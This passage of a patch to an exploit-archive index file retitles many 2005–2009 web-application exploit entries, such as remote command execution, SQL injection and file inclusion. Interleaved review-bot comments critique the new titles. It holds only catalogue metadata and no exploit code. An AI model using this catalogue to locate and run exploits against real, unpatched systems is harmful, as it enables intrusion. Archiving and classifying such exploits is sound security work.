@@ -16706,7 +16715,7 @@ id,file,description,date,author,platform,type,port 954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - 'index.cgi' Remote Command Execution",2005-04-25,z,cgi,webapps,0 980,platforms/cgi/webapps/980.pl,"I-Mall Commerce - 'i-mall.cgi' Remote Command Execution",2005-05-04,"Jerome Athias",cgi,webapps,0 982,platforms/php/webapps/982.c,"ZeroBoard - Worm Source Code",2005-05-06,anonymous,php,webapps,0 -989,platforms/php/webapps/989.pl,"PhotoPost - Arbitrary Data Remote",2005-05-13,basher13,php,webapps,0 +989,platforms/php/webapps/989.pl,"PhotoPost - Arbitrary Data Hash",2005-05-13,basher13,php,webapps,0 996,platforms/php/webapps/996.pl,"ZPanel 2.5b10 - SQL Injection",2005-05-17,RusH,php,webapps,0 1003,platforms/php/webapps/1003.c,"Fusion SBX 1.2 - Remote Command Execution",2005-05-20,Silentium,php,webapps,0 1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution (2)",2005-05-20,Nikyt0x,cgi,webapps,0 
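Review bot: "PhotoPost - Arbitrary Data Hash" is not a recognisable vulnerability class, and replacing the old "Arbitrary Data Remote" with it does not make 989 any more searchable; take the class from what 989.pl actually does (if it retrieves a password hash, use the same wording chosen for 907/910/1049 in this patch).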
@@ -16731,8 +16740,8 @@ id,file,description,date,author,platform,type,port 1039,platforms/cgi/webapps/1039.pl,"Webhints 1.03 - Remote Command Execution (Perl) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 1040,platforms/cgi/webapps/1040.c,"Webhints 1.03 - Remote Command Execution (C) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0 1041,platforms/cgi/webapps/1041.pl,"Webhints 1.03 - Remote Command Execution (Perl) (3)",2005-06-11,MadSheep,cgi,webapps,0 -1048,platforms/cgi/webapps/1048.pl,"eXtropia Shopping Cart - 'web_store.cgi' Remote",2005-06-15,"Action Spider",cgi,webapps,0 -1049,platforms/php/webapps/1049.php,"Mambo 4.5.2.1 - Fetch Password Hash Remote",2005-06-15,pokleyzz,php,webapps,0 +1048,platforms/cgi/webapps/1048.pl,"eXtropia Shopping Cart - 'web_store.cgi' Remote Command Execution",2005-06-15,"Action Spider",cgi,webapps,0 +1049,platforms/php/webapps/1049.php,"Mambo 4.5.2.1 - Fetch Password Hash",2005-06-15,pokleyzz,php,webapps,0 1050,platforms/php/webapps/1050.pl,"PHP Arena 1.1.3 - 'pafiledb.php' Remote Change Password",2005-06-15,Alpha_Programmer,php,webapps,0 1051,platforms/php/webapps/1051.pl,"Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor",2005-06-16,"Alberto Trivero",php,webapps,0 1052,platforms/php/webapps/1052.php,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (1)",2005-06-17,mh_p0rtal,php,webapps,0 
@@ -16823,7 +16832,7 @@ id,file,description,date,author,platform,type,port 1364,platforms/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,php,webapps,0 1367,platforms/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Commands Execution",2005-12-10,rgod,php,webapps,0 1370,platforms/php/webapps/1370.php,"phpCOIN 1.2.2 - 'phpcoinsessid' SQL Injection / Remote Code Execution",2005-12-12,rgod,php,webapps,0 -1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Overwrite Remote",2005-12-14,rgod,php,webapps,0 +1373,platforms/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution",2005-12-14,rgod,php,webapps,0 1379,platforms/php/webapps/1379.php,"PHPGedView 3.3.7 - Remote Code Execution",2005-12-20,rgod,php,webapps,0 1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary (2)",2006-02-20,DarkFig,php,webapps,0 1383,platforms/php/webapps/1383.txt,"phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure",2005-12-21,jet,php,webapps,0 
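Review bot: the new title for 1373 drops "Overwrite", which was the only part of the old title that said how the bug works ('_SERVER[REMOTE_ADDR]' being overwritten); keep the mechanism alongside the new class, e.g. "Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Overwrite Remote Command Execution", as other rows in this patch do (1797, "'Attachment mod_mime' Remote Command Execution").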
@@ -16887,7 +16896,7 @@ id,file,description,date,author,platform,type,port 1539,platforms/php/webapps/1539.txt,"MyBulletinBoard (MyBB) 1.03 - 'misc.php' SQL Injection",2006-02-28,Devil-00,php,webapps,0 1541,platforms/php/webapps/1541.pl,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution",2006-03-01,str0ke,php,webapps,0 1542,platforms/php/webapps/1542.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)",2006-03-01,LorD,php,webapps,0 -1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - 'cookie' Final SQL Injection 'mq=off'",2006-03-01,KingOfSka,php,webapps,0 +1543,platforms/php/webapps/1543.pl,"vuBB 0.2 Final - 'cookie' SQL Injection",2006-03-01,KingOfSka,php,webapps,0 1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD 'fileid' SQL Injection",2006-03-01,nukedx,php,webapps,0 1546,platforms/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection",2006-03-02,lorenzo,php,webapps,0 
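Review bot: the rewrite of 1543 silently drops the "mq=off" qualifier, which records the magic_quotes precondition for the injection, while 1793 later in this patch keeps "(mq=off)" in the same position; moving "Final" into the version string is fine, but retain the precondition: "vuBB 0.2 Final - 'cookie' SQL Injection (mq=off)".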
@@ -16903,7 +16912,7 @@ id,file,description,date,author,platform,type,port 1567,platforms/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,php,webapps,0 1569,platforms/asp/webapps/1569.pl,"d2kBlog 1.0.3 - 'memName' SQL Injection",2006-03-09,DevilBox,asp,webapps,0 1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - 'date' Remote Code Execution",2006-03-09,Hessam-x,php,webapps,0 -1571,platforms/asp/webapps/1571.html,"JiRos Banner Experience 1.0 - Create Authentication Bypass Remote",2006-03-09,nukedx,asp,webapps,0 +1571,platforms/asp/webapps/1571.html,"JiRos Banner Experience 1.0 - Unauthorised Create Admin",2006-03-09,nukedx,asp,webapps,0 1575,platforms/php/webapps/1575.pl,"Guestbook Script 1.7 - 'include_files' Remote Code Execution",2006-03-11,rgod,php,webapps,0 1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Nomenumbra,php,webapps,0 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,php,webapps,0 
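Review bot: 1571 goes from "Create Authentication Bypass Remote" to "Unauthorised Create Admin", which drops the "Authentication Bypass" class and adds "Unauthorised", a word used nowhere else in the file (other rows say "Unauthenticated", e.g. 31683). The file already has titles for this outcome, "Arbitrary Add Admin" (6023) and "Remote Administrative Account Addition" (774); reuse one of those and keep the class, e.g. "JiRos Banner Experience 1.0 - Authentication Bypass / Arbitrary Add Admin".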
@@ -17017,14 +17026,14 @@ id,file,description,date,author,platform,type,port 1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard 1.6.1 patch 1 - Local File Inclusion",2006-05-11,rgod,php,webapps,0 1778,platforms/php/webapps/1778.txt,"Foing 0.7.0 - 'phpBB' Remote File Inclusion",2006-05-12,"Kurdish Security",php,webapps,0 1779,platforms/php/webapps/1779.txt,"PHP Blue Dragon CMS 2.9 - Remote File Inclusion",2006-05-12,Kacper,php,webapps,0 -1780,platforms/php/webapps/1780.php,"phpBB 2.0.20 - Admin/Restore DB/default_lang Remote",2006-05-13,rgod,php,webapps,0 -1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - 'OptimisticLock' Remote",2006-05-14,rgod,php,webapps,0 +1780,platforms/php/webapps/1780.php,"phpBB 2.0.20 - Admin/Restore DB/default_lang Remote Command Execution",2006-05-13,rgod,php,webapps,0 +1785,platforms/php/webapps/1785.php,"Sugar Suite Open Source 4.2 - 'OptimisticLock' Command Execution",2006-05-14,rgod,php,webapps,0 1789,platforms/php/webapps/1789.txt,"TR Newsportal 0.36tr1 - 'poll.php' Remote File Inclusion",2006-05-15,Kacper,php,webapps,0 1790,platforms/php/webapps/1790.txt,"Squirrelcart 2.2.0 - 'cart_content.php' Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 1793,platforms/php/webapps/1793.pl,"DeluxeBB 1.06 - 'name' SQL Injection (mq=off)",2006-05-15,KingOfSka,php,webapps,0 1795,platforms/php/webapps/1795.txt,"ezusermanager 1.6 - Remote File Inclusion",2006-05-15,OLiBekaS,php,webapps,0 1796,platforms/php/webapps/1796.php,"PHP-Fusion 6.00.306 - 'srch_where' SQL Injection",2006-05-16,rgod,php,webapps,0 -1797,platforms/php/webapps/1797.php,"DeluxeBB 1.06 - 'Attachment mod_mime' Remote",2006-05-16,rgod,php,webapps,0 +1797,platforms/php/webapps/1797.php,"DeluxeBB 1.06 - 'Attachment mod_mime' Remote Command Execution",2006-05-16,rgod,php,webapps,0 1798,platforms/php/webapps/1798.txt,"Quezza BB 1.0 - 'quezza_root_path' File Inclusion",2006-05-17,nukedx,php,webapps,0 1800,platforms/php/webapps/1800.txt,"ScozNews 1.2.1 - 
'mainpath' Remote File Inclusion",2006-05-17,Kacper,php,webapps,0 1804,platforms/php/webapps/1804.txt,"phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass",2006-05-19,[Oo],php,webapps,0 @@ -17039,7 +17048,7 @@ id,file,description,date,author,platform,type,port 1816,platforms/php/webapps/1816.php,"Nucleus CMS 3.22 - 'DIR_LIBS' Remote File Inclusion",2006-05-23,rgod,php,webapps,0 1817,platforms/php/webapps/1817.txt,"Docebo 3.0.3 - Multiple Remote File Inclusions",2006-05-23,Kacper,php,webapps,0 1818,platforms/php/webapps/1818.txt,"phpCommunityCalendar 4.0.3 - Cross-Site Scripting / SQL Injection",2006-05-23,X0r_1,php,webapps,0 -1821,platforms/php/webapps/1821.php,"Drupal 4.7 - 'Attachment mod_mime' Remote",2006-05-24,rgod,php,webapps,0 +1821,platforms/php/webapps/1821.php,"Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution",2006-05-24,rgod,php,webapps,0 1823,platforms/php/webapps/1823.txt,"BASE 1.2.4 - melissa Snort Frontend Remote File Inclusion",2006-05-25,str0ke,php,webapps,0 1824,platforms/php/webapps/1824.txt,"open-medium.CMS 0.25 - '404.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 1825,platforms/php/webapps/1825.txt,"Back-End CMS 0.7.2.2 - 'BE_config.php' Remote File Inclusion",2006-05-25,Kacper,php,webapps,0 
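Review bot: within the -17017 hunk, 1785 is retitled "'OptimisticLock' Command Execution" while the two other rgod rows changed in the same hunk, 1780 and 1797, get "Remote Command Execution"; unless the SugarSuite issue really is local-only, make 1785 "Remote Command Execution" too so the three edits follow one rule.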
@@ -17328,13 +17337,13 @@ id,file,description,date,author,platform,type,port 2228,platforms/asp/webapps/2228.txt,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (1)",2006-08-20,"Chironex Fleckeri",asp,webapps,0 2229,platforms/php/webapps/2229.txt,"Shadows Rising RPG 0.0.5b - Remote File Inclusion",2006-08-20,Kacper,php,webapps,0 2230,platforms/asp/webapps/2230.txt,"LBlog 1.05 - 'comments.asp' SQL Injection",2006-08-20,"Chironex Fleckeri",asp,webapps,0 -2231,platforms/php/webapps/2231.php,"Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Remote",2006-08-20,rgod,php,webapps,0 +2231,platforms/php/webapps/2231.php,"Simple Machines Forum (SMF) 1.1 rc2 (Windows) - 'lngfile' Local File Inclusion",2006-08-20,rgod,php,webapps,0 2232,platforms/php/webapps/2232.pl,"SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)",2006-08-20,ASIANEAGLE,php,webapps,0 2235,platforms/php/webapps/2235.txt,"PHProjekt 6.1 - 'path_pre' Multiple Remote File Inclusions",2006-08-21,"the master",php,webapps,0 2236,platforms/php/webapps/2236.txt,"PHlyMail Lite 3.4.4 - 'folderprops.php' Remote File Inclusion (2)",2006-08-21,Kw3[R]Ln,php,webapps,0 2239,platforms/php/webapps/2239.txt,"Empire CMS 3.7 - 'checklevel.php' Remote File Inclusion",2006-08-22,"Bob Linuson",php,webapps,0 2240,platforms/php/webapps/2240.txt,"HPE 1.0 - HPEinc Remote File Inclusion (2)",2006-08-22,"the master",php,webapps,0 -2243,platforms/php/webapps/2243.php,"Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics Remote",2006-08-22,rgod,php,webapps,0 +2243,platforms/php/webapps/2243.php,"Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics",2006-08-22,rgod,php,webapps,0 2247,platforms/php/webapps/2247.php,"MercuryBoard 1.1.4 - 'User-Agent' SQL Injection",2006-08-23,rgod,php,webapps,0 2248,platforms/php/webapps/2248.pl,"phpBB All Topics Mod 1.5.0 - 'start' SQL Injection",2006-08-23,SpiderZ,php,webapps,0 2249,platforms/php/webapps/2249.txt,"pSlash 0.7 - 'lvc_include_dir' Remote File Inclusion",2006-08-23,"Mehmet Ince",php,webapps,0 
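Review bot: the new title for 2243, "Simple Machines Forum (SMF) 1.1 rc2 - Lock Topics", names a feature but no vulnerability class at all, so the edit removes the only classifying word ("Remote") without replacing it; state what 2243.php achieves (the 2231 edit in the same hunk shows the expected form, "'lngfile' Local File Inclusion").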
@@ -17369,7 +17378,7 @@ id,file,description,date,author,platform,type,port 2288,platforms/php/webapps/2288.php,"TikiWiki 1.9 Sirius - 'jhot.php' Remote Command Execution",2006-09-02,rgod,php,webapps,0 2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,php,webapps,0 2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - 'x_admindir' Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0 -2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - 'Zend_Hash_Del_Key_Or_Index' Remote",2006-09-03,rgod,php,webapps,0 +2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - 'Zend_Hash_Del_Key_Or_Index' Remote Command Execution",2006-09-03,rgod,php,webapps,0 2292,platforms/php/webapps/2292.txt,"Yappa-ng 2.3.1 - 'admin_modules' Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0 2293,platforms/php/webapps/2293.txt,"FlashChat 4.5.7 - 'aedating4CMS.php' Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps,0 2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - 'tr' SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0 
@@ -17416,7 +17425,7 @@ id,file,description,date,author,platform,type,port 2344,platforms/php/webapps/2344.txt,"OPENi-CMS 1.0.1beta - 'config' Remote File Inclusion",2006-09-11,basher13,php,webapps,0 2346,platforms/php/webapps/2346.txt,"WTools 0.0.1a - 'INCLUDE_PATH' Remote File Inclusion",2006-09-11,ddoshomo,php,webapps,0 2347,platforms/php/webapps/2347.txt,"PhpLinkExchange 1.0 - Include / Cross-Site Scripting",2006-09-11,s3rv3r_hack3r,php,webapps,0 -2348,platforms/php/webapps/2348.pl,"phpBB 2.0.21 - Poison Null Byte Remote",2006-09-11,ShAnKaR,php,webapps,0 +2348,platforms/php/webapps/2348.pl,"phpBB 2.0.21 - Poison Null Byte Remote File Upload",2006-09-11,ShAnKaR,php,webapps,0 2349,platforms/php/webapps/2349.txt,"phpBB XS 0.58 - 'functions.php' Remote File Inclusion",2006-09-12,AzzCoder,php,webapps,0 2350,platforms/php/webapps/2350.txt,"p4CMS 1.05 - 'abs_pfad' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2351,platforms/php/webapps/2351.txt,"Popper 1.41-r2 - 'form' Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 
@@ -18204,7 +18213,7 @@ id,file,description,date,author,platform,type,port 3498,platforms/php/webapps/3498.txt,"Creative Files 1.2 - 'kommentare.php' SQL Injection",2007-03-16,"Mehmet Ince",php,webapps,0 3500,platforms/php/webapps/3500.html,"Particle Blogger 1.2.0 - 'post.php?postid' SQL Injection",2007-03-16,WiLdBoY,php,webapps,0 3501,platforms/php/webapps/3501.txt,"PHP DB Designer 1.02 - Remote File Inclusion",2007-03-16,GoLd_M,php,webapps,0 -3502,platforms/php/webapps/3502.php,"PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Admin 2 'exec()'",2007-03-17,rgod,php,webapps,0 +3502,platforms/php/webapps/3502.php,"PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' Command Execution",2007-03-17,rgod,php,webapps,0 3503,platforms/php/webapps/3503.txt,"MPM Chat 2.5 - 'view.php?logi' Local File Inclusion",2007-03-17,GoLd_M,php,webapps,0 3504,platforms/php/webapps/3504.pl,"Active PHP Bookmark Notes 0.2.5 - Remote File Inclusion",2007-03-17,GoLd_M,php,webapps,0 3505,platforms/php/webapps/3505.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution (1)",2007-03-18,DarkFig,php,webapps,0 
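Review bot: the rewrite of 3502 removes the quoted function name 'exec()' that identified the sink, while other rows in this patch keep such names (697, "'Unserialize()' Remote Information Leak"); suggest "PHP-Stats 0.1.9.1b - 'PHP-stats-options.php' 'exec()' Command Execution" so the mechanism is not lost.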
@@ -18240,7 +18249,7 @@ id,file,description,date,author,platform,type,port 3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - 'catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - 'buyersend.asp?catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - 'default.asp?catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 -3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure Remote",2007-03-23,GoLd_M,php,webapps,0 +3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure",2007-03-23,GoLd_M,php,webapps,0 3556,platforms/asp/webapps/3556.html,"Active NewsLetter 4.3 - 'ViewNewspapers.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 3558,platforms/asp/webapps/3558.html,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 
@@ -19131,7 +19140,7 @@ id,file,description,date,author,platform,type,port 4954,platforms/php/webapps/4954.txt,"IDM-OS 1.0 - 'Filename' File Disclosure",2008-01-21,MhZ91,php,webapps,0 4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusions",2008-01-21,QTRinux,php,webapps,0 4956,platforms/php/webapps/4956.txt,"Alstrasoft Forum Pay Per Post Exchange 2.0 - SQL Injection",2008-01-21,t0pP8uZz,php,webapps,0 -4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x - 'MOIND_ID' Cookie Bug Remote",2008-01-21,nonroot,php,webapps,0 +4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x - 'MOIND_ID' Cookie Login Bypass",2008-01-21,nonroot,php,webapps,0 4958,platforms/php/webapps/4958.txt,"aflog 1.01 - Cross-Site Scripting / SQL Injection",2008-01-22,shinmai,php,webapps,0 4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - 'categoryId' SQL Injection",2008-01-22,S@BUN,php,webapps,0 4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.10 - SQL Injection",2008-01-22,RST/GHC,php,webapps,0 
@@ -19977,6 +19986,7 @@ id,file,description,date,author,platform,type,port 6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin",2008-07-08,"CWH Underground",php,webapps,0 6024,platforms/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusions",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6025,platforms/php/webapps/6025.txt,"Joomla! Component Content 1.0.0 - 'itemID' SQL Injection",2008-07-08,unknown_styler,php,webapps,0 +6026,platforms/linux/webapps/6026.pl,"Fonality trixbox - 'langChoice' Local File Inclusion (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,webapps,80 6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script 4.0 - SQL Injection",2008-07-08,t0pP8uZz,php,webapps,0 6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 - 'sIncPath' Remote File Inclusion",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6033,platforms/php/webapps/6033.pl,"AuraCMS 2.2.2 - '/pages_data.php' Arbitrary Edit/Add/Delete",2008-07-09,k1tk4t,php,webapps,0 
@@ -20115,7 +20125,7 @@ id,file,description,date,author,platform,type,port 6207,platforms/php/webapps/6207.txt,"LiteNews 0.1 - 'id' SQL Injection",2008-08-05,Stack,php,webapps,0 6208,platforms/php/webapps/6208.txt,"Wsn (Multiple Products) - Local File Inclusion / Code Execution",2008-08-06,otmorozok428,php,webapps,0 6209,platforms/php/webapps/6209.rb,"LoveCMS 1.6.2 Final - Remote Code Execution",2008-08-06,PoMdaPiMp,php,webapps,0 -6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings Remote",2008-08-06,PoMdaPiMp,php,webapps,0 +6210,platforms/php/webapps/6210.rb,"LoveCMS 1.6.2 Final - Update Settings",2008-08-06,PoMdaPiMp,php,webapps,0 6211,platforms/php/webapps/6211.txt,"Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting",2008-08-06,CraCkEr,php,webapps,0 6213,platforms/php/webapps/6213.txt,"Free Hosting Manager 1.2/2.0 - Insecure Cookie Handling",2008-08-06,Scary-Boys,php,webapps,0 6214,platforms/php/webapps/6214.php,"Discuz! 6.0.1 - 'searchid' SQL Injection",2008-08-06,james,php,webapps,0 
@@ -20288,7 +20298,7 @@ id,file,description,date,author,platform,type,port 6475,platforms/php/webapps/6475.txt,"PHP Crawler 0.8 - Remote File Inclusion",2008-09-17,Piker,php,webapps,0 6478,platforms/php/webapps/6478.txt,"Technote 7 - 'shop_this_skin_path' Remote File Inclusion",2008-09-17,webDEViL,php,webapps,0 6480,platforms/php/webapps/6480.txt,"X10media Mp3 Search Engine 1.5.5 - Remote File Inclusion",2008-09-17,THUNDER,php,webapps,0 -6482,platforms/php/webapps/6482.txt,"addalink 4 Beta - Write Approved Links Remote",2008-09-17,Pepelux,php,webapps,0 +6482,platforms/php/webapps/6482.txt,"addalink 4 Beta - Write Approved Links",2008-09-17,Pepelux,php,webapps,0 6483,platforms/php/webapps/6483.txt,"E-PHP CMS - 'article.php' SQL Injection",2008-09-18,HaCkeR_EgY,php,webapps,0 6485,platforms/php/webapps/6485.txt,"addalink 4 - 'category_id' SQL Injection",2008-09-18,ka0x,php,webapps,0 6486,platforms/php/webapps/6486.txt,"ProArcadeScript 1.3 - 'random' SQL Injection",2008-09-18,SuNHouSe2,php,webapps,0 
@@ -21066,7 +21076,7 @@ id,file,description,date,author,platform,type,port 7450,platforms/asp/webapps/7450.txt,"CodeAvalanche FreeForum - Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps,0 7451,platforms/php/webapps/7451.txt,"PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting",2008-12-14,ahmadbady,php,webapps,0 7453,platforms/php/webapps/7453.txt,"FLDS 1.2a - 'redir.php' SQL Injection",2008-12-14,nuclear,php,webapps,0 -7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Remote",2008-12-14,x0r,php,webapps,0 +7455,platforms/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Priviledge Escalation",2008-12-14,x0r,php,webapps,0 7456,platforms/php/webapps/7456.txt,"AvailScript Article Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0 7457,platforms/php/webapps/7457.txt,"AvailScript Classmate Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps,0 7458,platforms/php/webapps/7458.txt,"Mediatheka 4.2 - 'lang' Local File Inclusion",2008-12-14,Osirys,php,webapps,0 
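Review bot: the new 7455 row misspells "Priviledge Escalation"; it should read "Privilege Escalation" so the description matches the spelling used in the other files.csv rows.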
@@ -21499,7 +21509,7 @@ id,file,description,date,author,platform,type,port 8086,platforms/cgi/webapps/8086.txt,"i-dreams GB 5.4 Final - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8087,platforms/cgi/webapps/8087.txt,"i-dreams GB Server - 'admin.dat' File Disclosure",2009-02-20,Pouya_Server,cgi,webapps,0 8088,platforms/php/webapps/8088.txt,"Osmodia Bulletin Board 1.x - 'admin.txt' File Disclosure",2009-02-20,Pouya_Server,php,webapps,0 -8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' Command Injection 'via SQL Injection'",2009-02-20,Osirys,php,webapps,0 +8089,platforms/php/webapps/8089.pl,"Graugon Forum 1 - 'id' Command Injection / SQL Injection",2009-02-20,Osirys,php,webapps,0 8092,platforms/php/webapps/8092.txt,"zFeeder 1.6 - 'admin.php' Unauthenticated Admin Bypass",2009-02-23,ahmadbady,php,webapps,0 8093,platforms/php/webapps/8093.pl,"pPIM 1.01 - 'notes.php' Remote Command Execution",2009-02-23,JosS,php,webapps,0 8094,platforms/php/webapps/8094.pl,"Free Arcade Script 1.0 - Local File Inclusion Command Execution",2009-02-23,Osirys,php,webapps,0 
@@ -21835,7 +21845,7 @@ id,file,description,date,author,platform,type,port 8731,platforms/php/webapps/8731.php,"Joomla! Component com_gsticketsystem - 'catid' Blind SQL Injection",2009-05-19,InjEctOr5,php,webapps,0 8734,platforms/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure",2009-05-19,Securitylab.ir,asp,webapps,0 8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 - Insecure Cookie Handling",2009-05-19,Mr.tro0oqy,php,webapps,0 -8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery 1.4.22 - Remote",2009-05-19,girex,php,webapps,0 +8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery 1.4.22 - SQL Injection",2009-05-19,girex,php,webapps,0 8737,platforms/php/webapps/8737.txt,"vidshare pro - SQL Injection / Cross-Site Scripting",2009-05-19,snakespc,php,webapps,0 8738,platforms/php/webapps/8738.txt,"Dog Pedigree Online Database 1.0.1b - Multiple SQL Injections",2009-05-19,YEnH4ckEr,php,webapps,0 8739,platforms/php/webapps/8739.txt,"Dog Pedigree Online Database 1.0.1b - Insecure Cookie Handling",2009-05-19,YEnH4ckEr,php,webapps,0 
@@ -22616,7 +22626,7 @@ id,file,description,date,author,platform,type,port 10331,platforms/windows/webapps/10331.txt,"iWeb HTTP Server - Directory Traversal",2009-12-06,mr_me,windows,webapps,0 10337,platforms/php/webapps/10337.txt,"Chipmunk NewsLetter - Persistent Cross-Site Scripting",2009-12-07,mr_me,php,webapps,0 10341,platforms/php/webapps/10341.txt,"SiSplet CMS 2008-01-24 - Multiple Remote File Inclusions",2009-12-07,cr4wl3r,php,webapps,0 -10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 -",2009-12-07,Global-Evolution,hardware,webapps,0 +10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 - Multiple Vulnerabilities",2009-12-07,Global-Evolution,hardware,webapps,0 10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-Commerce Group - SQL Injection",2009-12-08,"Dr.0rYX & Cr3W-DZ",php,webapps,0 10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-12-07,"Amol Naik",php,webapps,0 10354,platforms/php/webapps/10354.txt,"Viscacha 0.8 Gold - Persistent Cross-Site Scripting",2009-12-08,mr_me,php,webapps,0 
@@ -22754,7 +22764,7 @@ id,file,description,date,author,platform,type,port 10549,platforms/php/webapps/10549.txt,"Joomla! Component Event Manager - Blind SQL Injection",2009-12-18,FL0RiX,php,webapps,0 10550,platforms/php/webapps/10550.txt,"Joomla! Component City Portal - Blind SQL Injection",2009-12-18,FL0RiX,php,webapps,0 10552,platforms/php/webapps/10552.txt,"FestOs 2.2.1 - Multiple Remote File Inclusions",2009-12-19,cr4wl3r,php,webapps,0 -10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 -",2009-12-19,Global-Evolution,php,webapps,0 +10555,platforms/php/webapps/10555.txt,"Barracuda Web Firewall 660 Firmware 7.3.1.007 - Multiple Vulnerabilities",2009-12-19,Global-Evolution,php,webapps,0 10558,platforms/asp/webapps/10558.txt,"Toast Forums 1.8 - Database Disclosure",2009-12-19,ViRuSMaN,asp,webapps,0 10560,platforms/php/webapps/10560.txt,"Lizard Cart - Multiple SQL Injections",2009-12-19,cr4wl3r,php,webapps,0 10561,platforms/php/webapps/10561.txt,"CFAGCMS - SQL 